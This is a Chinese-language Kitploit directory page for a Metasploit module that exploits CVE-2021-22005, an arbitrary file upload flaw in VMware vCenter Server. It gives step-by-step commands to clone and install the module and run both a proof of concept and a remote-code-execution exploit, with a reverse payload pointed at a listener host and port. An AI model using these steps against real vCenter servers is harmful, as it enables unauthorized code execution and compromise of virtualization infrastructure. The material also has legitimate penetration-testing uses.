Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/tiagob0b/cve-2021-22005
漏洞利用框架漏洞分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubtiagob0b/cve-2021-22005

CVE-2021-22005

针对CVE-2021-22005 VMware vCenter任意文件上传漏洞的Metasploit模块,包含概念验证和远程代码执行利用。

查看仓库
2324年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-22005-metasploit

关于 CVE-2021-22005 VMware vCenter Server 任意文件上传漏洞的 metasploit 脚本(POC/EXP)

准备 POC

root@kitploit:~
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp vmware_vcenter_server_file_upload_poc.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/vmware_vcenter_server_file_upload_poc.py
msfconsole

POC 用法

root@kitploit:~
set rhost <漏洞 IP/主机>
set port <漏洞端口>
set ssl <默认:true 用于 https>
exploit

结果

脚本会上传一个无害的 jsp 文件,其中包含 base64 编码的 "Could be vuln by CVE-2021-22005" 文本 poc

准备 EXP

root@kitploit:~
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit cd CVE-2021-22005-metasploit mkdir -p ~/.msf4/modules/exploits/linux/http cp vmware_vcenter_server_file_upload_to_rce.py ~/.msf4/modules/exploits/linux/http/ chmod +x ~/.msf4/modules/exploits/linux/http/vmware_vcenter_server_file_upload_to_rce.py msfconsole

漏洞利用用法

root@kitploit:~
set target <目标>
set PAYLOAD <载荷>
set rhost <漏洞 IP>
set port <漏洞端口>
set LHOST <监听主机 IP>
set LPORT <监听端口>
exploit

漏洞利用

exploit

参考

  • https://github.com/5gstudent/CVE-2021-22005-
  • https://github.com/rwincey/CVE-2021-22005
下载工具